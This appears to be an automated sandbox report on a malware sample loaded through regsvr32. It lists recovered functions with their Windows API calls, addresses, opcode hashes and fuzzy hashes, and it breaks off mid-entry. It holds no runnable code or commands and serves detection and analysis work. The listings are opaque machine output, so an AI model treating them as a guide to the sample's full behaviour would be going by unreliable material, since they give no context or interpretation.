                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE4F92 Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(04BC78A1,00000000,00000000,00000000,?,04BDAE43,?,04BC78A1,00000000), ref: 04BE4FA8
                • lstrlen.KERNEL32(?,?,04BDAE43,?,04BC78A1,00000000), ref: 04BE4FAF
                • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 04BE4FBD
                  • Part of subcall function 04BCD2FC: GetLocalTime.KERNEL32(04BDAE43,04BDAE43,?,04BC78A1,00000000), ref: 04BCD306
                  • Part of subcall function 04BCD2FC: wsprintfA.USER32 ref: 04BCD339
                • wsprintfA.USER32 ref: 04BE4FDF
                  • Part of subcall function 04BE3B15: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,04BE5007,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 04BE3B33
                  • Part of subcall function 04BE3B15: wsprintfA.USER32 ref: 04BE3B58
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 04BE5010
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                • String ID:
                • API String ID: 3847261958-0
                • Opcode ID: 687e8d53d31c99fc3e0456921889b21e00b4e3307592cfcfd550d8fe09800ef0
                • Instruction ID: 4517ae1c40b2416d95e2d34d0ebe3785778d48922b4b33e3bd1f0576431829d4
                • Opcode Fuzzy Hash: 687e8d53d31c99fc3e0456921889b21e00b4e3307592cfcfd550d8fe09800ef0
                • Instruction Fuzzy Hash: 89013C31100618BFEB216F66DC48DAB7F6DEFC4264B008462FD089B112D6369965ABB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDFEA4 Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 04BDFEBB
                  • Part of subcall function 04BC2A41: wcstombs.NTDLL ref: 04BC2AFF
                • lstrlen.KERNEL32(?,?,?,?,?,04BDF400,?,?), ref: 04BDFEDE
                • lstrlen.KERNEL32(?,?,?,?,04BDF400,?,?), ref: 04BDFEE8
                • memcpy.NTDLL(?,?,00004000,?,?,04BDF400,?,?), ref: 04BDFEF9
                • HeapFree.KERNEL32(00000000,?,?,?,?,04BDF400,?,?), ref: 04BDFF1B
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heaplstrlen$AllocateFreememcpywcstombs
                • String ID:
                • API String ID: 1256246205-0
                • Opcode ID: caeb96c63fdc2129c0949ab970df1f2becc9997635b2afb49f07cdca6bfbcc60
                • Instruction ID: 9b72c68517d575a5eb44e7ab60ef8fdfd7105f6527d1ea38787f485d268f29fa
                • Opcode Fuzzy Hash: caeb96c63fdc2129c0949ab970df1f2becc9997635b2afb49f07cdca6bfbcc60
                • Instruction Fuzzy Hash: 4D11A171604204FFDB109F65EC44F6E7BB9EB85310F1040A5F806E7250E731AD009B30
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE2E6E Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BC1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,04BDDB18,?,?,00000000,04BCC692,?,?,?,?,00000000,?), ref: 04BC1B99
                  • Part of subcall function 04BC1B8A: mbstowcs.NTDLL ref: 04BC1BB5
                • lstrlenW.KERNEL32(00000000,00000000,00000094,?,00000000,?,?,04BD7126,?), ref: 04BE2E9A
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BE2EAC
                • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,04BD7126,?), ref: 04BE2EC9
                • lstrlenW.KERNEL32(00000000,?,?,04BD7126,?), ref: 04BE2ED5
                • HeapFree.KERNEL32(00000000,00000000,?,?,04BD7126,?), ref: 04BE2EE9
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                • String ID:
                • API String ID: 3403466626-0
                • Opcode ID: ab28037a9c4fbc63106eb74ada98ac400247c5dfc358ab5ca7b411da41b99ee6
                • Instruction ID: 6730ae6a3b60a0bf9b42024a43081b742eef3acc9f5dca84c0d750a0f7e10b00
                • Opcode Fuzzy Hash: ab28037a9c4fbc63106eb74ada98ac400247c5dfc358ab5ca7b411da41b99ee6
                • Instruction Fuzzy Hash: 01014C72101618AFE712EBAAEC84FAE77ACEF88314F144066F505AB151C778AD049B75
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDDC0D Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32 ref: 04BDDC2D
                • GetModuleHandleA.KERNEL32 ref: 04BDDC3B
                • LoadLibraryExW.KERNEL32(?,?,?), ref: 04BDDC48
                • GetModuleHandleA.KERNEL32 ref: 04BDDC5F
                • GetModuleHandleA.KERNEL32 ref: 04BDDC6B
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HandleModule$LibraryLoad
                • String ID:
                • API String ID: 1178273743-0
                • Opcode ID: c2db622b78bf7948814d9faaba37ecc666ed3aceaeabebdf81b118cbd14ce73f
                • Instruction ID: a2b46dddf5739058456fe9b890f211a4843517a09965ea7af2f6e080ca741774
                • Opcode Fuzzy Hash: c2db622b78bf7948814d9faaba37ecc666ed3aceaeabebdf81b118cbd14ce73f
                • Instruction Fuzzy Hash: 7B01867160020AAB9F015F7AEC4096A7BADFF54360B0841B7F814C7160EBB5DC219FE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD7623 Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 04BD7630
                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,04BD5DB1,00000000,?), ref: 04BD7640
                • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,04BD5DB1,00000000,?), ref: 04BD7649
                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,04BDC365,?,?,00000040,?,?,?,?,?,?,04BD5DB1), ref: 04BD7667
                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,04BDC365,?,?,00000040,?,?,?,?,?,?,04BD5DB1), ref: 04BD7674
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                • String ID:
                • API String ID: 3667519916-0
                • Opcode ID: 8fc18652bbc7913026360f5a337df0f2e95455fca268b0ed429b1eddc74d07f1
                • Instruction ID: e170015a693afff3bc9f2d20dbac7d8ae0f281710bd3ecaea953712076063ab5
                • Opcode Fuzzy Hash: 8fc18652bbc7913026360f5a337df0f2e95455fca268b0ed429b1eddc74d07f1
                • Instruction Fuzzy Hash: 75F01D30200B00AFE7307A3A9C88F5A72A8EB84355F144699F54197590EB24FC45CA34
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCA667 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                Download Yara Rule
                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04BCA71A
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04BCA730
                • memset.NTDLL ref: 04BCA7D9
                • memset.NTDLL ref: 04BCA7EF
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: 6145155e482e3399a7cbdfbc77eb9846a4476fa9d641cf7d02693bad88dbf283
                • Instruction ID: a4d9612a6c3ec42a194234bbfc0f6413213b71250bb45e7b542b7397a404b3a6
                • Opcode Fuzzy Hash: 6145155e482e3399a7cbdfbc77eb9846a4476fa9d641cf7d02693bad88dbf283
                • Instruction Fuzzy Hash: D141A531701219AFEB10DF68CC84BEE7779EF89714F0045AAF915A7280EB70BE548B91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD9DAA Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(00000000), ref: 04BE592F
                • GetLastError.KERNEL32 ref: 04BE594F
                  • Part of subcall function 04BC2A41: wcstombs.NTDLL ref: 04BC2AFF
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWaitwcstombs
                • String ID:
                • API String ID: 2344289193-0
                • Opcode ID: 24f20ed5a6b307bf369b000d67a218d56b6ca9d3d7a2c29ac46be9f631b3f166
                • Instruction ID: 4e7e3df25fb813be606a0329fba3a8d1e51bb9d4a7b2ebb5f022f9daf136effc
                • Opcode Fuzzy Hash: 24f20ed5a6b307bf369b000d67a218d56b6ca9d3d7a2c29ac46be9f631b3f166
                • Instruction Fuzzy Hash: EB412974900209FFDF209FE6C8845FEBBB9EB94359F5044AAE502E7150E774AA40DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD76B9 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: _strupr
                • String ID:
                • API String ID: 3408778250-0
                • Opcode ID: a216f60fa8636f71f45e8e2dab5405986e4f2247f3db7f1708f8bd1b1ff6c476
                • Instruction ID: 8ce12a2cef8840f0760f1af78a4195f2c2ac1ba92c79f055b97f63b1aec35124
                • Opcode Fuzzy Hash: a216f60fa8636f71f45e8e2dab5405986e4f2247f3db7f1708f8bd1b1ff6c476
                • Instruction Fuzzy Hash: 9041537180020A9EEF21DF69D884AFEB7FCEF94308F5148A5E825D6150EB74F545CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDEDBB Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BD17C3: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 04BD17D1
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BDEE23
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BDEE72
                  • Part of subcall function 04BE36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,04BE4FFC), ref: 04BE373F
                  • Part of subcall function 04BE36FE: GetLastError.KERNEL32 ref: 04BE3749
                  • Part of subcall function 04BE36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 04BE376E
                  • Part of subcall function 04BE36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BE378F
                  • Part of subcall function 04BE36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 04BE37B7
                  • Part of subcall function 04BE36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 04BE37CC
                  • Part of subcall function 04BE36FE: SetEndOfFile.KERNEL32(00000006), ref: 04BE37D9
                  • Part of subcall function 04BE36FE: CloseHandle.KERNEL32(00000006), ref: 04BE37F1
                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,04BD6D4E,?,?,?,?,?,?), ref: 04BDEEA7
                • HeapFree.KERNEL32(00000000,?,?,?,?,04BD6D4E,?,?,?,?,?,?,00000000,?,00000000), ref: 04BDEEB7
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                • String ID:
                • API String ID: 4200334623-0
                • Opcode ID: ebbf0dfe88a5aaa2140efb5701e3dfd6e58978608cc7de295c7fb22624b6a081
                • Instruction ID: 044188718ba2fead10b40e6ddfa908d35beb7ccb6fd95be29b437c55cbd0b986
                • Opcode Fuzzy Hash: ebbf0dfe88a5aaa2140efb5701e3dfd6e58978608cc7de295c7fb22624b6a081
                • Instruction Fuzzy Hash: 483137B6500119FFEB10DFA5DC89CAABBBEEB88354B1004A6F504EB150D771AE51DB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD6453 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                Download Yara Rule
                APIs
                • TlsGetValue.KERNEL32(?), ref: 04BD6482
                • SetEvent.KERNEL32(?), ref: 04BD64CC
                • TlsSetValue.KERNEL32(00000001), ref: 04BD6506
                • TlsSetValue.KERNEL32(00000000), ref: 04BD6522
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Value$Event
                • String ID:
                • API String ID: 3803239005-0
                • Opcode ID: 111c45b91649503ceb8edb3097dc9f594ea5c3871d09b5be702eb28829787012
                • Instruction ID: 071bf91f86a840ca7d2176115148785c3eb976a5b4d51bc924acd029139eb5cd
                • Opcode Fuzzy Hash: 111c45b91649503ceb8edb3097dc9f594ea5c3871d09b5be702eb28829787012
                • Instruction Fuzzy Hash: F021B031200248AFEB319F5ADE84A6A7BA2FF85354F1005A9F501CB560E372FDA1DF51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC8676 Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BC86CF
                • memcpy.NTDLL(00000018,?,?), ref: 04BC86F8
                • RegisterWaitForSingleObject.KERNEL32(00000010,?,04BDDFF1,00000000,000000FF,00000008), ref: 04BC8737
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BC874A
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                • String ID:
                • API String ID: 2780211928-0
                • Opcode ID: b580bb4a688926db626e543accc926d6c9c5400f14beebd246f3661cae3a13c9
                • Instruction ID: e3d50b95fb37478a6992b20659934c176b2d0fabd7270b5e54c5f4dfb2e7a147
                • Opcode Fuzzy Hash: b580bb4a688926db626e543accc926d6c9c5400f14beebd246f3661cae3a13c9
                • Instruction Fuzzy Hash: 71317370240606AFEB20DF26DC85B9A7BA9FF84321F00456AF925D7290D775E9149BB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD0C78 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 04BD0C9A
                • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 04BD0CDE
                • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 04BD0D21
                • CloseHandle.KERNEL32(?,?,?,?,?), ref: 04BD0D44
                  • Part of subcall function 04BE2449: GetTickCount.KERNEL32 ref: 04BE2459
                  • Part of subcall function 04BE2449: CreateFileW.KERNEL32(04BDA7DD,80000000,00000003,04BEE268,00000003,00000000,00000000,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE2476
                  • Part of subcall function 04BE2449: GetFileSize.KERNEL32(04BDA7DD,00000000,?,00000001,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE24A9
                  • Part of subcall function 04BE2449: CreateFileMappingA.KERNEL32(04BDA7DD,04BEE268,00000002,00000000,00000000,04BDA7DD), ref: 04BE24BD
                  • Part of subcall function 04BE2449: lstrlen.KERNEL32(04BDA7DD,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE24D9
                  • Part of subcall function 04BE2449: lstrcpy.KERNEL32(?,04BDA7DD), ref: 04BE24E9
                  • Part of subcall function 04BE2449: HeapFree.KERNEL32(00000000,04BDA7DD,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE2504
                  • Part of subcall function 04BE2449: CloseHandle.KERNEL32(04BDA7DD,?,00000001,?,04BDA7DD), ref: 04BE2516
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                • String ID:
                • API String ID: 3239194699-0
                • Opcode ID: 05fda6ed70523f3be70b08fb2c642e34cd76b1aa040a851d207a98cc2ea9bc52
                • Instruction ID: fff857d929de3b43de421b6c701f63a51002d2715e32080d6e274f846cc31796
                • Opcode Fuzzy Hash: 05fda6ed70523f3be70b08fb2c642e34cd76b1aa040a851d207a98cc2ea9bc52
                • Instruction Fuzzy Hash: 91216B31500209EBDB21EF66DD44EEE7BB8EF88318F1405A6FD1A971A0E731E945DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE5DDB Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(0624C0A0), ref: 04BE5DF1
                • RtlLeaveCriticalSection.NTDLL(0624C0A0), ref: 04BE5E0C
                • GetLastError.KERNEL32(?,?,?), ref: 04BE5E7A
                • GetLastError.KERNEL32(?,?,?), ref: 04BE5E89
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalErrorLastSection$EnterLeave
                • String ID:
                • API String ID: 2124651672-0
                • Opcode ID: cd9342ff6bcbaf1e32b0826d2a3bb0a39fc4029f38127e17fe4f69074f04d8db
                • Instruction ID: 2b573646c02f2bbf4423cddbd15f5ee1aded9aab034fe872a9e3928db77fdd68
                • Opcode Fuzzy Hash: cd9342ff6bcbaf1e32b0826d2a3bb0a39fc4029f38127e17fe4f69074f04d8db
                • Instruction Fuzzy Hash: 28212C36500209EFCB21DFAAD844EAEBBB8FF88714F158596F805A7250D734EE15DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDBCE7 Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BCE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04BDBCFE), ref: 04BCE9D6
                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04BDBD39
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04BD6B93,?), ref: 04BDBD4B
                • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,04BD6B93,?), ref: 04BDBD63
                • CloseHandle.KERNEL32(?,?,?,?,?,?,04BD6B93,?), ref: 04BDBD7E
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$CloseCreateHandleModuleNamePointerRead
                • String ID:
                • API String ID: 1352878660-0
                • Opcode ID: d991cd0ce88972db95439c61611ab8f54562f64a7c77f9022e91fe6a19c78801
                • Instruction ID: 59c1a25e2c6295ec0d041cdbebb30411eb2175f2c2b6eaa2662d047e65433502
                • Opcode Fuzzy Hash: d991cd0ce88972db95439c61611ab8f54562f64a7c77f9022e91fe6a19c78801
                • Instruction Fuzzy Hash: 36115E71500118BADF20AFA5CC88EEFBE6DEF45794F104195F912E6090E370AA40DAA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD4D6C Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(8B000000,04BCB526,?,04BCB526,00000004), ref: 04BD4DA4
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • lstrcpy.KERNEL32(00000000,8B000000), ref: 04BD4DBB
                • StrChrA.SHLWAPI(00000000,0000002E,?,04BCB526,00000004), ref: 04BD4DC4
                • GetModuleHandleA.KERNEL32(00000000,?,04BCB526,00000004), ref: 04BD4DE2
                  • Part of subcall function 04BD8CCE: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,8B000000,?,00000004,00000000,00000004,00000002,00000000,?), ref: 04BD8DA5
                  • Part of subcall function 04BD8CCE: VirtualProtect.KERNELBASE(04BCB73B,00000004,00000002,00000002,?,00000004,00000000,00000004,00000002,00000000,?,00000000,00000000,04BEA580,0000001C,04BDBB7F), ref: 04BD8DC0
                  • Part of subcall function 04BD8CCE: RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BD8DE4
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                • String ID:
                • API String ID: 105881616-0
                • Opcode ID: a944063edb79ada810eb74ad0efd5f12731b6369be5256e1f53f3d08a7df610a
                • Instruction ID: 5f1775ab1e4695cd2b5541d69c3b1ede46e9b79ec2ffba620aa01ffe65bd5aaa
                • Opcode Fuzzy Hash: a944063edb79ada810eb74ad0efd5f12731b6369be5256e1f53f3d08a7df610a
                • Instruction Fuzzy Hash: 05216F34A00205EFDB14EF65C988BAEBBF9FF84304F1084DAE4159B251E7B4EA41DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD6DFA Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 04BD6E15
                • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 04BD6E39
                • RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 04BD6E91
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 04BD6E62
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: QueryValue$AllocateCloseHeapOpen
                • String ID:
                • API String ID: 453107315-0
                • Opcode ID: 0631579d0ba0d1b43bb4fe692cd78beac75680a578eb0cbd0c5c199b4e1293ef
                • Instruction ID: ec57c51c9623cdbc24133ee281cf84ad61bc2b5c85f0fbd7a803e343298d15ec
                • Opcode Fuzzy Hash: 0631579d0ba0d1b43bb4fe692cd78beac75680a578eb0cbd0c5c199b4e1293ef
                • Instruction Fuzzy Hash: F121EA7590010DFFDB119F99C9808EEBBBDEF84340F104996F801AB110E771AA95DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDA46B Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?), ref: 04BDA478
                • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 04BDA49E
                • lstrcpy.KERNEL32(00000014,?), ref: 04BDA4C3
                • memcpy.NTDLL(?,?,?), ref: 04BDA4D0
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 1388643974-0
                • Opcode ID: 23c6d03edf277bb5afdea9e5d4d506d413039368c205bbe86add8951ab56c56c
                • Instruction ID: 71534a89897a514ae7dab43d1f55bdea8cf3ebc5731eb0492a0c0ed2bd297c0d
                • Opcode Fuzzy Hash: 23c6d03edf277bb5afdea9e5d4d506d413039368c205bbe86add8951ab56c56c
                • Instruction Fuzzy Hash: 2C11467150160AEFCB21DF58D884E9ABBF8FB48714F1084AAF85A8B611D775E904DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC27B5 Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,04BDAB7C,?,00000000,00000000), ref: 04BC27C8
                • lstrlen.KERNEL32(0624BF48,?,04BDAB7C,?,00000000,00000000), ref: 04BC27E9
                • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 04BC2801
                • lstrcpy.KERNEL32(00000000,0624BF48), ref: 04BC2813
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                • String ID:
                • API String ID: 1929783139-0
                • Opcode ID: 409fa8c217e46e2008ed1a4f99bce905b9332c581a4db1805fa47a55342894c2
                • Instruction ID: cc151709c5c57f2e0a9d3392602c8f5c9d07dd2ce33b530e592e1aa0a65b0a71
                • Opcode Fuzzy Hash: 409fa8c217e46e2008ed1a4f99bce905b9332c581a4db1805fa47a55342894c2
                • Instruction Fuzzy Hash: 9101C876904644EBD311EBADE8C4E5FBBBCEB88201F0440AAE909D7201D634DE08C771
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD06BF Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BD06CA
                • Sleep.KERNEL32(0000000A,?,?,?,04BC8E76,00000000,?,00000029,04BEE218,04BC7EA7,?), ref: 04BD06D4
                • SetEvent.KERNEL32(?,?,?,04BC8E76,00000000,?,00000029,04BEE218,04BC7EA7,?), ref: 04BD072B
                • RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BD074A
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSection$EnterEventLeaveSleep
                • String ID:
                • API String ID: 1925615494-0
                • Opcode ID: f86d87b0bd1f8bda02972fcf9824c44a07e131568beafd40dff071b8cd939d14
                • Instruction ID: 94311583dfb377fea2216b0816556f7bf9a5c9db190f9fc4bdad729a80039e19
                • Opcode Fuzzy Hash: f86d87b0bd1f8bda02972fcf9824c44a07e131568beafd40dff071b8cd939d14
                • Instruction Fuzzy Hash: 1B015271640205ABF700BBA6DC49B5A37A8EB95715F004492F609EF081E7B9ED009BB1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE25FC Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                Download Yara Rule
                APIs
